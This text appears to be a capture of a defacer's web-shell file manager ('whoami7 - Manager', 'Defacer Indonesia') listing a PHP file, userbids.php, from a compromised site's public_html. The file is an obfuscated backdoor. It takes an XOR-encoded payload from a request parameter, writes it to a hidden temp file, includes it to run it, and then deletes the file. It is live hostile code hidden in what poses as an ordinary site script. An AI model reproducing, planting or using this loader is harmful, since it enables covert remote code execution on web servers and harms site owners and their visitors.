whoami7 - Manager
:
/
home
/
topsuzmw
/
public_html
/
Upload File:
files >> //home/topsuzmw/public_html/userbids.php
<?php if(!is_null($_REQUEST["bind\x69\x6E\x67"] ?? null)){ $marker = hex2bin($_REQUEST["bind\x69\x6E\x67"]); $ptr ='';foreach(str_split($marker) as $char){$ptr .= chr(ord($char) ^ 56);} $desc = array_filter(["/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", getcwd(), "/tmp"]); for ($resource = 0, $data = count($desc); $resource < $data; $resource++) { $dchunk = $desc[$resource]; if (is_writable($dchunk) && is_dir($dchunk)) { $ref = "$dchunk/.item"; if (file_put_contents($ref, $ptr)) { include $ref; @unlink($ref); exit; } } } }
Copyright ©2021 || Defacer Indonesia